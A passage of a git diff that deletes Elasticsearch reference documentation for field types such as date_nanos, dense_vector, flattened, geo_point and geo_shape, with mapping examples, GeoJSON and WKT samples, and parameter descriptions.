"_doc": { - "properties": { - "date": { - "type": "date_nanos" <1> - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "date": "2015-01-01" } <2> - -PUT my-index-000001/_doc/2 -{ "date": "2015-01-01T12:10:30.123456789Z" } <3> - -PUT my-index-000001/_doc/3 -{ "date": 1420070400 } <4> - -GET my-index-000001/_search -{ - "sort": { "date": "asc"} <5> -} - -GET my-index-000001/_search -{ - "script_fields" : { - "my_field" : { - "script" : { - "lang" : "painless", - "source" : "doc['date'].value.nano" <6> - } - } - } -} - -GET my-index-000001/_search -{ - "docvalue_fields" : [ - { - "field" : "date", - "format": "strict_date_time" <7> - } - ] -} --------------------------------------------------- - -<1> The `date` field uses the default `format`. -<2> This document uses a plain date. -<3> This document includes a time. -<4> This document uses milliseconds-since-the-epoch. -<5> Note that the `sort` values that are returned are all in -nanoseconds-since-the-epoch. -<6> Access the nanosecond part of the date in a script -<7> Use doc value fields, which can be formatted in nanosecond -resolution - -You can also specify multiple date formats separated by `||`. The -same mapping parameters than with the `date` field can be used. - -[[date-nanos-limitations]] -==== Limitations - -Aggregations are still on millisecond resolution, even when using a `date_nanos` -field. This limitation also affects <>. diff --git a/docs/reference/mapping/types/dense-vector.asciidoc b/docs/reference/mapping/types/dense-vector.asciidoc deleted file mode 100644 index bd8bf775092..00000000000 --- a/docs/reference/mapping/types/dense-vector.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[dense-vector]] -=== Dense vector field type -++++ -Dense vector -++++ - -A `dense_vector` field stores dense vectors of float values. -The maximum number of dimensions that can be in a vector should -not exceed 2048. A `dense_vector` field is a single-valued field. - -These vectors can be used for <>. -For example, a document score can represent a distance between -a given query vector and the indexed document vector. - -You index a dense vector as an array of floats. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_vector": { - "type": "dense_vector", - "dims": 3 <1> - }, - "my_text" : { - "type" : "keyword" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "my_text" : "text1", - "my_vector" : [0.5, 10, 6] -} - -PUT my-index-000001/_doc/2 -{ - "my_text" : "text2", - "my_vector" : [-0.5, 10, 10] -} - --------------------------------------------------- - -<1> dims—the number of dimensions in the vector, required parameter. - -Internally, each document's dense vector is encoded as a binary -doc value. Its size in bytes is equal to -`4 * dims + 4`, where `dims`—the number of the vector's dimensions. diff --git a/docs/reference/mapping/types/flattened.asciidoc b/docs/reference/mapping/types/flattened.asciidoc deleted file mode 100644 index c5cd3fd2fe5..00000000000 --- a/docs/reference/mapping/types/flattened.asciidoc +++ /dev/null @@ -1,191 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[flattened]] -=== Flattened field type -++++ -Flattened -++++ - -By default, each subfield in an object is mapped and indexed separately. If -the names or types of the subfields are not known in advance, then they are -<>. - -The `flattened` type provides an alternative approach, where the entire -object is mapped as a single field. Given an object, the `flattened` -mapping will parse out its leaf values and index them into one field as -keywords. The object's contents can then be searched through simple queries -and aggregations. - -This data type can be useful for indexing objects with a large or unknown -number of unique keys. Only one field mapping is created for the whole JSON -object, which can help prevent a <> -from having too many distinct field mappings. - -On the other hand, flattened object fields present a trade-off in terms of -search functionality. Only basic queries are allowed, with no support for -numeric range queries or highlighting. Further information on the limitations -can be found in the <> section. - -NOTE: The `flattened` mapping type should **not** be used for indexing all -document content, as it treats all values as keywords and does not provide full -search functionality. The default approach, where each subfield has its own -entry in the mappings, works well in the majority of cases. - -An flattened object field can be created as follows: - -[source,console] --------------------------------- -PUT bug_reports -{ - "mappings": { - "properties": { - "title": { - "type": "text" - }, - "labels": { - "type": "flattened" - } - } - } -} - -POST bug_reports/_doc/1 -{ - "title": "Results are not sorted correctly.", - "labels": { - "priority": "urgent", - "release": ["v1.2.5", "v1.3.0"], - "timestamp": { - "created": 1541458026, - "closed": 1541457010 - } - } -} --------------------------------- -// TESTSETUP - -During indexing, tokens are created for each leaf value in the JSON object. The -values are indexed as string keywords, without analysis or special handling for -numbers or dates. - -Querying the top-level `flattened` field searches all leaf values in the -object: - -[source,console] --------------------------------- -POST bug_reports/_search -{ - "query": { - "term": {"labels": "urgent"} - } -} --------------------------------- - -To query on a specific key in the flattened object, object dot notation is used: - -[source,console] --------------------------------- -POST bug_reports/_search -{ - "query": { - "term": {"labels.release": "v1.3.0"} - } -} --------------------------------- - -[[supported-operations]] -==== Supported operations - -Because of the similarities in the way values are indexed, `flattened` -fields share much of the same mapping and search functionality as -<> fields. - -Currently, flattened object fields can be used with the following query types: - -- `term`, `terms`, and `terms_set` -- `prefix` -- `range` -- `match` and `multi_match` -- `query_string` and `simple_query_string` -- `exists` - -When querying, it is not possible to refer to field keys using wildcards, as in -`{ "term": {"labels.time*": 1541457010}}`. Note that all queries, including -`range`, treat the values as string keywords. Highlighting is not supported on -`flattened` fields. - -It is possible to sort on an flattened object field, as well as perform simple -keyword-style aggregations such as `terms`. As with queries, there is no -special support for numerics -- all values in the JSON object are treated as -keywords. When sorting, this implies that values are compared -lexicographically. - -Flattened object fields currently cannot be stored. It is not possible to -specify the <> parameter in the mapping. - -[[flattened-params]] -==== Parameters for flattened object fields - -The following mapping parameters are accepted: - -[horizontal] - -<>:: - - Mapping field-level query time boosting. Accepts a floating point number, - defaults to `1.0`. - -`depth_limit`:: - - The maximum allowed depth of the flattened object field, in terms of nested - inner objects. If a flattened object field exceeds this limit, then an - error will be thrown. Defaults to `20`. Note that `depth_limit` can be - updated dynamically through the <> API. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should global ordinals be loaded eagerly on refresh? Accepts `true` or - `false` (default). Enabling this is a good idea on fields that are - frequently used for terms aggregations. - -<>:: - - Leaf values longer than this limit will not be indexed. By default, there - is no limit and all values will be indexed. Note that this limit applies - to the leaf values within the flattened object field, and not the length of - the entire field. - -<>:: - - Determines if the field should be searchable. Accepts `true` (default) or - `false`. - -<>:: - - What information should be stored in the index for scoring purposes. - Defaults to `docs` but can also be set to `freqs` to take term frequency - into account when computing scores. - -<>:: - - A string value which is substituted for any explicit `null` values within - the flattened object field. Defaults to `null`, which means null sields are - treated as if it were missing. - -<>:: - - Which scoring algorithm or _similarity_ should be used. Defaults - to `BM25`. - -`split_queries_on_whitespace`:: - - Whether <> should split the input on - whitespace when building a query for this field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/geo-point.asciidoc b/docs/reference/mapping/types/geo-point.asciidoc deleted file mode 100644 index 11585db8830..00000000000 --- a/docs/reference/mapping/types/geo-point.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[geo-point]] -=== Geo-point field type -++++ -Geo-point -++++ - -Fields of type `geo_point` accept latitude-longitude pairs, which can be used: - -* to find geo-points within a <>, - within a certain <> of a central point, - or within a <> or within a <>. -* to aggregate documents <> - or by <> from a central point. -* to integrate distance into a document's <>. -* to <> documents by distance. - -There are five ways that a geo-point may be specified, as demonstrated below: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Geo-point as an object", - "location": { <1> - "lat": 41.12, - "lon": -71.34 - } -} - -PUT my-index-000001/_doc/2 -{ - "text": "Geo-point as a string", - "location": "41.12,-71.34" <2> -} - -PUT my-index-000001/_doc/3 -{ - "text": "Geo-point as a geohash", - "location": "drm3btev3e86" <3> -} - -PUT my-index-000001/_doc/4 -{ - "text": "Geo-point as an array", - "location": [ -71.34, 41.12 ] <4> -} - -PUT my-index-000001/_doc/5 -{ - "text": "Geo-point as a WKT POINT primitive", - "location" : "POINT (-71.34 41.12)" <5> -} - -GET my-index-000001/_search -{ - "query": { - "geo_bounding_box": { <6> - "location": { - "top_left": { - "lat": 42, - "lon": -72 - }, - "bottom_right": { - "lat": 40, - "lon": -74 - } - } - } - } -} --------------------------------------------------- - -<1> Geo-point expressed as an object, with `lat` and `lon` keys. -<2> Geo-point expressed as a string with the format: `"lat,lon"`. -<3> Geo-point expressed as a geohash. -<4> Geo-point expressed as an array with the format: [ `lon`, `lat`] -<5> Geo-point expressed as a https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -POINT with the format: `"POINT(lon lat)"` -<6> A geo-bounding box query which finds all geo-points that fall inside the box. - -[IMPORTANT] -.Geo-points expressed as an array or string -================================================== - -Please note that string geo-points are ordered as `lat,lon`, while array -geo-points are ordered as the reverse: `lon,lat`. - -Originally, `lat,lon` was used for both array and string, but the array -format was changed early on to conform to the format used by GeoJSON. - -================================================== - -[NOTE] -A point can be expressed as a {wikipedia}/Geohash[geohash]. -Geohashes are {wikipedia}/Base32[base32] encoded strings of -the bits of the latitude and longitude interleaved. Each character in a geohash -adds additional 5 bits to the precision. So the longer the hash, the more -precise it is. For the indexing purposed geohashs are translated into -latitude-longitude pairs. During this process only first 12 characters are -used, so specifying more than 12 characters in a geohash doesn't increase the -precision. The 12 characters provide 60 bits, which should reduce a possible -error to less than 2cm. - -[[geo-point-params]] -==== Parameters for `geo_point` fields - -The following parameters are accepted by `geo_point` fields: - -[horizontal] - -<>:: - - If `true`, malformed geo-points are ignored. If `false` (default), - malformed geo-points throw an exception and reject the whole document. - -`ignore_z_value`:: - - If `true` (default) three dimension points will be accepted (stored in source) - but only latitude and longitude values will be indexed; the third dimension is - ignored. If `false`, geo-points containing any more than latitude and longitude - (two dimensions) values throw an exception and reject the whole document. - -<>:: - - Accepts an geopoint value which is substituted for any explicit `null` values. - Defaults to `null`, which means the field is treated as missing. - -==== Using geo-points in scripts - -When accessing the value of a geo-point in a script, the value is returned as -a `GeoPoint` object, which allows access to the `.lat` and `.lon` values -respectively: - -[source,painless] --------------------------------------------------- -def geopoint = doc['location'].value; -def lat = geopoint.lat; -def lon = geopoint.lon; --------------------------------------------------- - -For performance reasons, it is better to access the lat/lon values directly: - -[source,painless] --------------------------------------------------- -def lat = doc['location'].lat; -def lon = doc['location'].lon; --------------------------------------------------- diff --git a/docs/reference/mapping/types/geo-shape.asciidoc b/docs/reference/mapping/types/geo-shape.asciidoc deleted file mode 100644 index 7945c4435a4..00000000000 --- a/docs/reference/mapping/types/geo-shape.asciidoc +++ /dev/null @@ -1,674 +0,0 @@ -[[geo-shape]] -=== Geo-shape field type -++++ -Geo-shape -++++ - -The `geo_shape` data type facilitates the indexing of and searching -with arbitrary geo shapes such as rectangles and polygons. It should be -used when either the data being indexed or the queries being executed -contain shapes other than just points. - -You can query documents using this type using -<>. - -[[geo-shape-mapping-options]] -[discrete] -==== Mapping Options - -The geo_shape mapping maps geo_json geometry objects to the geo_shape -type. To enable it, users must explicitly map fields to the geo_shape -type. - -[cols="<,<,<",options="header",] -|======================================================================= -|Option |Description| Default - -|`tree` |deprecated[6.6, PrefixTrees no longer used] Name of the PrefixTree -implementation to be used: `geohash` for GeohashPrefixTree and `quadtree` -for QuadPrefixTree. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `quadtree` - -|`precision` |deprecated[6.6, PrefixTrees no longer used] This parameter may -be used instead of `tree_levels` to set an appropriate value for the -`tree_levels` parameter. The value specifies the desired precision and -Elasticsearch will calculate the best tree_levels value to honor this -precision. The value should be a number followed by an optional distance -unit. Valid distance units include: `in`, `inch`, `yd`, `yard`, `mi`, -`miles`, `km`, `kilometers`, `m`,`meters`, `cm`,`centimeters`, `mm`, -`millimeters`. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `50m` - -|`tree_levels` |deprecated[6.6, PrefixTrees no longer used] Maximum number -of layers to be used by the PrefixTree. This can be used to control the -precision of shape representations andtherefore how many terms are -indexed. Defaults to the default value of the chosen PrefixTree -implementation. Since this parameter requires a certain level of -understanding of the underlying implementation, users may use the -`precision` parameter instead. However, Elasticsearch only uses the -tree_levels parameter internally and this is what is returned via the -mapping API even if you use the precision parameter. Note: This parameter -is only relevant for `term` and `recursive` strategies. -| various - -|`strategy` |deprecated[6.6, PrefixTrees no longer used] The strategy -parameter defines the approach for how to represent shapes at indexing -and search time. It also influences the capabilities available so it -is recommended to let Elasticsearch set this parameter automatically. -There are two strategies available: `recursive`, and `term`. -Recursive and Term strategies are deprecated and will be removed in a -future version. While they are still available, the Term strategy -supports point types only (the `points_only` parameter will be -automatically set to true) while Recursive strategy supports all -shape types. (IMPORTANT: see <> for more -detailed information about these strategies) -| `recursive` - -|`distance_error_pct` |deprecated[6.6, PrefixTrees no longer used] Used as a -hint to the PrefixTree about how precise it should be. Defaults to 0.025 (2.5%) -with 0.5 as the maximum supported value. PERFORMANCE NOTE: This value will -default to 0 if a `precision` or `tree_level` definition is explicitly defined. -This guarantees spatial precision at the level defined in the mapping. This can -lead to significant memory usage for high resolution shapes with low error -(e.g., large shapes at 1m with < 0.001 error). To improve indexing performance -(at the cost of query accuracy) explicitly define `tree_level` or `precision` -along with a reasonable `distance_error_pct`, noting that large shapes will have -greater false positives. Note: This parameter is only relevant for `term` and -`recursive` strategies. -| `0.025` - -|`orientation` -a|Optional. Vertex order for the shape's coordinates list. - -This parameter sets and returns only a `RIGHT` (counterclockwise) or `LEFT` -(clockwise) value. However, you can specify either value in multiple ways. - -To set `RIGHT`, use one of the following arguments or its uppercase -variant: - -* `right` -* `counterclockwise` -* `ccw` - -To set `LEFT`, use one of the following arguments or its uppercase -variant: - -* `left` -* `clockwise` -* `cw` - -Defaults to `RIGHT` to comply with https://www.ogc.org/docs/is[OGC standards]. -OGC standards define outer ring vertices in counterclockwise order with inner -ring (hole) vertices in clockwise order. - -Individual GeoJSON or WKT documents can override this parameter. -| `RIGHT` - -|`points_only` |deprecated[6.6, PrefixTrees no longer used] Setting this option to -`true` (defaults to `false`) configures the `geo_shape` field type for point -shapes only (NOTE: Multi-Points are not yet supported). This optimizes index and -search performance for the `geohash` and `quadtree` when it is known that only points -will be indexed. At present geo_shape queries can not be executed on `geo_point` -field types. This option bridges the gap by improving point performance on a -`geo_shape` field so that `geo_shape` queries are optimal on a point only field. -| `false` - -|`ignore_malformed` |If true, malformed GeoJSON or WKT shapes are ignored. If -false (default), malformed GeoJSON and WKT shapes throw an exception and reject the -entire document. -| `false` - -|`ignore_z_value` |If `true` (default) three dimension points will be accepted (stored in source) -but only latitude and longitude values will be indexed; the third dimension is ignored. If `false`, -geo-points containing any more than latitude and longitude (two dimensions) values throw an exception -and reject the whole document. -| `true` - -|`coerce` |If `true` unclosed linear rings in polygons will be automatically closed. -| `false` - -|======================================================================= - - -[[geoshape-indexing-approach]] -[discrete] -==== Indexing approach -GeoShape types are indexed by decomposing the shape into a triangular mesh and -indexing each triangle as a 7 dimension point in a BKD tree. This provides -near perfect spatial resolution (down to 1e-7 decimal degree precision) since all -spatial relations are computed using an encoded vector representation of the -original shape instead of a raster-grid representation as used by the -<> indexing approach. Performance of the tessellator primarily -depends on the number of vertices that define the polygon/multi-polygon. While -this is the default indexing technique prefix trees can still be used by setting -the `tree` or `strategy` parameters according to the appropriate -<>. Note that these parameters are now deprecated -and will be removed in a future version. - -*IMPORTANT NOTES* - -`CONTAINS` relation query - when using the new default vector indexing strategy, `geo_shape` -queries with `relation` defined as `contains` are supported for indices created with -ElasticSearch 7.5.0 or higher. - - -[[prefix-trees]] -[discrete] -==== Prefix trees - -deprecated[6.6, PrefixTrees no longer used] To efficiently represent shapes in -an inverted index, Shapes are converted into a series of hashes representing -grid squares (commonly referred to as "rasters") using implementations of a -PrefixTree. The tree notion comes from the fact that the PrefixTree uses multiple -grid layers, each with an increasing level of precision to represent the Earth. -This can be thought of as increasing the level of detail of a map or image at higher -zoom levels. Since this approach causes precision issues with indexed shape, it has -been deprecated in favor of a vector indexing approach that indexes the shapes as a -triangular mesh (see <>). - -Multiple PrefixTree implementations are provided: - -* GeohashPrefixTree - Uses -{wikipedia}/Geohash[geohashes] for grid squares. -Geohashes are base32 encoded strings of the bits of the latitude and -longitude interleaved. So the longer the hash, the more precise it is. -Each character added to the geohash represents another tree level and -adds 5 bits of precision to the geohash. A geohash represents a -rectangular area and has 32 sub rectangles. The maximum number of levels -in Elasticsearch is 24; the default is 9. -* QuadPrefixTree - Uses a -{wikipedia}/Quadtree[quadtree] for grid squares. -Similar to geohash, quad trees interleave the bits of the latitude and -longitude the resulting hash is a bit set. A tree level in a quad tree -represents 2 bits in this bit set, one for each coordinate. The maximum -number of levels for the quad trees in Elasticsearch is 29; the default is 21. - -[[spatial-strategy]] -[discrete] -===== Spatial strategies -deprecated[6.6, PrefixTrees no longer used] The indexing implementation -selected relies on a SpatialStrategy for choosing how to decompose the shapes -(either as grid squares or a tessellated triangular mesh). Each strategy -answers the following: - -* What type of Shapes can be indexed? -* What types of Query Operations and Shapes can be used? -* Does it support more than one Shape per field? - -The following Strategy implementations (with corresponding capabilities) -are provided: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|Strategy |Supported Shapes |Supported Queries |Multiple Shapes - -|`recursive` |<> |`INTERSECTS`, `DISJOINT`, `WITHIN`, `CONTAINS` |Yes -|`term` |<> |`INTERSECTS` |Yes - -|======================================================================= - -[discrete] -===== Accuracy - -`Recursive` and `Term` strategies do not provide 100% accuracy and depending on -how they are configured it may return some false positives for `INTERSECTS`, -`WITHIN` and `CONTAINS` queries, and some false negatives for `DISJOINT` queries. -To mitigate this, it is important to select an appropriate value for the tree_levels -parameter and to adjust expectations accordingly. For example, a point may be near -the border of a particular grid cell and may thus not match a query that only matches -the cell right next to it -- even though the shape is very close to the point. - -[discrete] -===== Example - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} --------------------------------------------------- -// TESTSETUP - -This mapping definition maps the location field to the geo_shape -type using the default vector implementation. It provides -approximately 1e-7 decimal degree precision. - -[discrete] -===== Performance considerations with Prefix Trees - -deprecated[6.6, PrefixTrees no longer used] With prefix trees, -Elasticsearch uses the paths in the tree as terms in the inverted index -and in queries. The higher the level (and thus the precision), the more -terms are generated. Of course, calculating the terms, keeping them in -memory, and storing them on disk all have a price. Especially with higher -tree levels, indices can become extremely large even with a modest amount -of data. Additionally, the size of the features also matters. Big, complex -polygons can take up a lot of space at higher tree levels. Which setting -is right depends on the use case. Generally one trades off accuracy against -index size and query performance. - -The defaults in Elasticsearch for both implementations are a compromise -between index size and a reasonable level of precision of 50m at the -equator. This allows for indexing tens of millions of shapes without -overly bloating the resulting index too much relative to the input size. - -[NOTE] -Geo-shape queries on geo-shapes implemented with PrefixTrees will not be executed if -<> is set to false. - -[[input-structure]] -[discrete] -==== Input Structure - -Shapes can be represented using either the http://geojson.org[GeoJSON] -or https://docs.opengeospatial.org/is/12-063r5/12-063r5.html[Well-Known Text] -(WKT) format. The following table provides a mapping of GeoJSON and WKT -to Elasticsearch types: - -[cols="<,<,<,<",options="header",] -|======================================================================= -|GeoJSON Type |WKT Type |Elasticsearch Type |Description - -|`Point` |`POINT` |`point` |A single geographic coordinate. Note: Elasticsearch uses WGS-84 coordinates only. -|`LineString` |`LINESTRING` |`linestring` |An arbitrary line given two or more points. -|`Polygon` |`POLYGON` |`polygon` |A _closed_ polygon whose first and last point -must match, thus requiring `n + 1` vertices to create an `n`-sided -polygon and a minimum of `4` vertices. -|`MultiPoint` |`MULTIPOINT` |`multipoint` |An array of unconnected, but likely related -points. -|`MultiLineString` |`MULTILINESTRING` |`multilinestring` |An array of separate linestrings. -|`MultiPolygon` |`MULTIPOLYGON` |`multipolygon` |An array of separate polygons. -|`GeometryCollection` |`GEOMETRYCOLLECTION` |`geometrycollection` | A GeoJSON shape similar to the -`multi*` shapes except that multiple types can coexist (e.g., a Point -and a LineString). -|`N/A` |`BBOX` |`envelope` |A bounding rectangle, or envelope, specified by -specifying only the top left and bottom right points. -|`N/A` |`N/A` |`circle` |A circle specified by a center point and radius with -units, which default to `METERS`. -|======================================================================= - -[NOTE] -============================================= -For all types, both the inner `type` and `coordinates` fields are -required. - -In GeoJSON and WKT, and therefore Elasticsearch, the correct *coordinate -order is longitude, latitude (X, Y)* within coordinate arrays. This -differs from many Geospatial APIs (e.g., Google Maps) that generally -use the colloquial latitude, longitude (Y, X). -============================================= - -[[geo-point-type]] -[discrete] -===== http://geojson.org/geojson-spec.html#id2[Point] - -A point is a single geographic coordinate, such as the location of a -building or the current position given by a smartphone's Geolocation -API. The following is an example of a point in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "point", - "coordinates" : [-77.03653, 38.897676] - } -} --------------------------------------------------- - -The following is an example of a point in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POINT (-77.03653 38.897676)" -} --------------------------------------------------- - -[discrete] -[[geo-linestring]] -===== http://geojson.org/geojson-spec.html#id3[LineString] - -A `linestring` defined by an array of two or more positions. By -specifying only two points, the `linestring` will represent a straight -line. Specifying more than two points creates an arbitrary path. The -following is an example of a LineString in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "linestring", - "coordinates" : [[-77.03653, 38.897676], [-77.009051, 38.889939]] - } -} --------------------------------------------------- - -The following is an example of a LineString in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "LINESTRING (-77.03653 38.897676, -77.009051 38.889939)" -} --------------------------------------------------- - -The above `linestring` would draw a straight line starting at the White -House to the US Capitol Building. - -[discrete] -[[geo-polygon]] -===== http://geojson.org/geojson-spec.html#id4[Polygon] - -A polygon is defined by a list of a list of points. The first and last -points in each (outer) list must be the same (the polygon must be -closed). The following is an example of a Polygon in GeoJSON. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0))" -} --------------------------------------------------- - -The first array represents the outer boundary of the polygon, the other -arrays represent the interior shapes ("holes"). The following is a GeoJSON example -of a polygon with a hole: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0] ], - [ [100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2] ] - ] - } -} --------------------------------------------------- - -The following is an example of a Polygon with a hole in WKT: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "POLYGON ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8, 100.2 0.2))" -} --------------------------------------------------- - -*IMPORTANT NOTE:* WKT does not enforce a specific order for vertices thus -ambiguous polygons around the dateline and poles are possible. -https://tools.ietf.org/html/rfc7946#section-3.1.6[GeoJSON] mandates that the -outer polygon must be counterclockwise and interior shapes must be clockwise, -which agrees with the Open Geospatial Consortium (OGC) -https://www.opengeospatial.org/standards/sfa[Simple Feature Access] -specification for vertex ordering. - -Elasticsearch accepts both clockwise and counterclockwise polygons if they -appear not to cross the dateline (i.e. they cross less than 180° of longitude), -but for polygons that do cross the dateline (or for other polygons wider than -180°) Elasticsearch requires the vertex ordering to comply with the OGC and -GeoJSON specifications. Otherwise, an unintended polygon may be created and -unexpected query/filter results will be returned. - -The following provides an example of an ambiguous polygon. Elasticsearch will -apply the GeoJSON standard to eliminate ambiguity resulting in a polygon that -crosses the dateline. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "coordinates" : [ - [ [-177.0, 10.0], [176.0, 15.0], [172.0, 0.0], [176.0, -15.0], [-177.0, -10.0], [-177.0, 10.0] ], - [ [178.2, 8.2], [-178.8, 8.2], [-180.8, -8.8], [178.2, 8.8] ] - ] - } -} --------------------------------------------------- -// TEST[catch:/mapper_parsing_exception/] - -An `orientation` parameter can be defined when setting the geo_shape mapping (see <>). This will define vertex -order for the coordinate list on the mapped geo_shape field. It can also be overridden on each document. The following is an example for -overriding the orientation on a document: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "polygon", - "orientation" : "clockwise", - "coordinates" : [ - [ [100.0, 0.0], [100.0, 1.0], [101.0, 1.0], [101.0, 0.0], [100.0, 0.0] ] - ] - } -} --------------------------------------------------- - -[discrete] -[[geo-multipoint]] -===== http://geojson.org/geojson-spec.html#id5[MultiPoint] - -The following is an example of a list of geojson points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipoint", - "coordinates" : [ - [102.0, 2.0], [103.0, 2.0] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT points: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOINT (102.0 2.0, 103.0 2.0)" -} --------------------------------------------------- - -[discrete] -[[geo-multilinestring]] -===== http://geojson.org/geojson-spec.html#id6[MultiLineString] - -The following is an example of a list of geojson linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multilinestring", - "coordinates" : [ - [ [102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0] ], - [ [100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0] ], - [ [100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT linestrings: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTILINESTRING ((102.0 2.0, 103.0 2.0, 103.0 3.0, 102.0 3.0), (100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8))" -} --------------------------------------------------- - -[discrete] -[[geo-multipolygon]] -===== http://geojson.org/geojson-spec.html#id7[MultiPolygon] - -The following is an example of a list of geojson polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "multipolygon", - "coordinates" : [ - [ [[102.0, 2.0], [103.0, 2.0], [103.0, 3.0], [102.0, 3.0], [102.0, 2.0]] ], - [ [[100.0, 0.0], [101.0, 0.0], [101.0, 1.0], [100.0, 1.0], [100.0, 0.0]], - [[100.2, 0.2], [100.8, 0.2], [100.8, 0.8], [100.2, 0.8], [100.2, 0.2]] ] - ] - } -} --------------------------------------------------- - -The following is an example of a list of WKT polygons (second polygon contains a hole): - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "MULTIPOLYGON (((102.0 2.0, 103.0 2.0, 103.0 3.0, 102.0 3.0, 102.0 2.0)), ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8, 100.2 0.2)))" -} --------------------------------------------------- - -[discrete] -[[geo-geometry_collection]] -===== http://geojson.org/geojson-spec.html#geometrycollection[Geometry Collection] - -The following is an example of a collection of geojson geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type": "geometrycollection", - "geometries": [ - { - "type": "point", - "coordinates": [100.0, 0.0] - }, - { - "type": "linestring", - "coordinates": [ [101.0, 0.0], [102.0, 1.0] ] - } - ] - } -} --------------------------------------------------- - -The following is an example of a collection of WKT geometry objects: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "GEOMETRYCOLLECTION (POINT (100.0 0.0), LINESTRING (101.0 0.0, 102.0 1.0))" -} --------------------------------------------------- - - -[discrete] -===== Envelope - -Elasticsearch supports an `envelope` type, which consists of coordinates -for upper left and lower right points of the shape to represent a -bounding rectangle in the format `[[minLon, maxLat], [maxLon, minLat]]`: - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "envelope", - "coordinates" : [ [100.0, 1.0], [101.0, 0.0] ] - } -} --------------------------------------------------- - -The following is an example of an envelope using the WKT BBOX format: - -*NOTE:* WKT specification expects the following order: minLon, maxLon, maxLat, minLat. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : "BBOX (100.0, 102.0, 2.0, 0.0)" -} --------------------------------------------------- - -[discrete] -===== Circle - -Elasticsearch supports a `circle` type, which consists of a center -point with a radius. Note that this circle representation can only -be indexed when using the `recursive` Prefix Tree strategy. For -the default <> circles should be approximated using -a `POLYGON`. - -[source,console] --------------------------------------------------- -POST /example/_doc -{ - "location" : { - "type" : "circle", - "coordinates" : [101.0, 1.0], - "radius" : "100m" - } -} --------------------------------------------------- -// TEST[skip:not supported in default] - -Note: The inner `radius` field is required. If not specified, then -the units of the `radius` will default to `METERS`. - -*NOTE:* Neither GeoJSON or WKT support a point-radius circle type. - -[discrete] -==== Sorting and Retrieving index Shapes - -Due to the complex input structure and index representation of shapes, -it is not currently possible to sort shapes or retrieve their fields -directly. The geo_shape value is only retrievable through the `_source` -field. diff --git a/docs/reference/mapping/types/histogram.asciidoc b/docs/reference/mapping/types/histogram.asciidoc deleted file mode 100644 index e47ea875e1a..00000000000 --- a/docs/reference/mapping/types/histogram.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[histogram]] -=== Histogram field type -++++ -Histogram -++++ - -A field to store pre-aggregated numerical data representing a histogram. -This data is defined using two paired arrays: - -* A `values` array of <> numbers, representing the buckets for -the histogram. These values must be provided in ascending order. -* A corresponding `counts` array of <> numbers, representing how -many values fall into each bucket. These numbers must be positive or zero. - -Because the elements in the 